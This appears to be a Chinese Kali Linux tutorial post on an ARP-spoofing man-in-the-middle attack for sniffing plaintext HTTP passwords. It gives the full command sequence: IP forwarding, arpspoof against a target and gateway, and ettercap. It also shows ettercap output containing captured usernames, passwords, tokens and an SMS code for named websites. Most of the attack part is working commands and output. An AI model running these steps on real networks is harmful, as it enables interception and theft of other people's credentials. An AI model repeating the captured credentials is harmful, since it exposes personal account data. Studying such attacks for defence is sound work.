[关闭]
@websec007 2018-08-08T09:16:54.000000Z 字数 2722 阅读 3141

3、arpspoof 之HTTP协议明文密码监听

kali学习 工具收集

副标题:中间人攻击之明文密码抓取

1、工具准备

注:(1)(2)主要目的实现中间人攻击,(3)Ettercap工具的作用就是实现流量中明文密码的抓取;

2、图片流截断抓取实现流程

3、攻击场景演示(HTTP明文密码抓取)

3.1 信息收集

(1)目标主机:192.168.31.123
(2)网关地址:192.168.31.1

3.2 开启本地网卡数据转发

  1. root@kali:~# echo 1 > /proc/sys/net/ipv4/ip_forward

3.2 进行目标主机网关欺骗

  1. root@kali:~# arpspoof -i eth0 -t 192.168.31.123 192.168.31.1
  3. 0:c:29:3:9:67 8:60:6e:c8:75:c4 0806 42: arp reply 192.168.31.1 is-at 0:c:29:3:9:67
  4. 0:c:29:3:9:67 8:60:6e:c8:75:c4 0806 42: arp reply 192.168.31.1 is-at 0:c:29:3:9:67
  5. 0:c:29:3:9:67 8:60:6e:c8:75:c4 0806 42: arp reply 192.168.31.1 is-at 0:c:29:3:9:67
  6. 0:c:29:3:9:67 8:60:6e:c8:75:c4 0806 42: arp reply 192.168.31.1 is-at 0:c:29:3:9:67
  7. ....
  8. 不断的向网段中发送arp广播,告诉主机192.168.31.123目标网关地址的mac地址是kali主机的网卡地址,从而达到欺骗目标主机,为实现中间人攻击准备好前奏。

3.4 开启本地网卡图片抓取工具drifnet

  1. root@kali:~# ettercap -Tq -i eth0
  3. ettercap 0.8.0 copyright 2001-2013 Ettercap Development Team
  5. Listening on:
  6.   eth0 -> 00:0C:29:03:09:67
  7.       192.168.31.5/255.255.255.0
  8.       fe80::20c:29ff:fe03:967/64
  10. SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
  11. Privileges dropped to UID 65534 GID 65534...
  13.   33 plugins
  14.   42 protocol dissectors
  15.   57 ports monitored
  16. 16074 mac vendor fingerprint
  17. 1766 tcp OS fingerprint
  18. 2182 known services
  20. Randomizing 255 hosts for scanning...
  21. Scanning the whole netmask for 255 hosts...
  22. * |==================================================>| 100.00 %
  24. 1 hosts added to the hosts list...
  25. Starting Unified sniffing...
  28. Text only Interface activated...
  29. Hit 'h' for inline help
  31. HTTP : 122.115.47.39:80 -> USER: account  PASS: 3910298f457443292bd5c55f6e5f7955  INFO: http://www.antian365.com/forum.php
  32. CONTENT: fastloginfield=username&username=myles&password=3910298f457943393bd5c55f6e5f7955&quickforward=yes&handlekey=ls
  34. DHCP: [D4:97:0B:8B:EF:32] REQUEST 192.168.31.217
  35. HTTP : 58.216.109.182:80 -> USER:   PASS: password@123  INFO: http://www.jianshu.com/users/password/mobile_reset
  36. CONTENT: utf8=%E2%9C%93&authenticity_token=dYEmtPe3i5IMls5ZlWXOjHRJq3njZw%2BJcFXUb%2BAVHjh6dc2DaCHRYUA5Ncx991ohGHBDe5UmxIbCelq2s5mpfA%3D%3D&mobile_number=153xxxxxx&country_code=CN&force_user_exist=true&sms_code=099443&captcha%5Bvalidation%5D%5Bchallenge%5D=035735baab7de19d874f29005210ab7c64&captcha%5Bvalidation%5D%5Bgt%5D=a10ea6a23a441db3d956598988dff3c4&captcha%5Bvalidation%5D%5Bvalidate%5D=b0e792abf42d9bc79be5d69c0524c036&captcha%5Bvalidation%5D%5Bseccode%5D=b0e792abf42d9bc79be5d69c0524c036%7Cjordan&captcha%5Bid%5D=8d039d96-7b0c-4c03-bf0d-2534efe82e17&geetest_challenge=035735baab7de19d874f29005210ab7c64&geetest_validate=b0e792abf42d9bc79be5d69c0524c036&geetest_seccode=b0e792abf42d9bc79be5d69c0524c036%7Cjordan&password=msfadmin%2321&password_confirmation=msfadmin%2321&commit=%E9%87%8D%E7%BD%AE%E5%AF%86%E7%A0%81
添加新批注
在作者公开此批注前,只有你和作者可见。
回复批注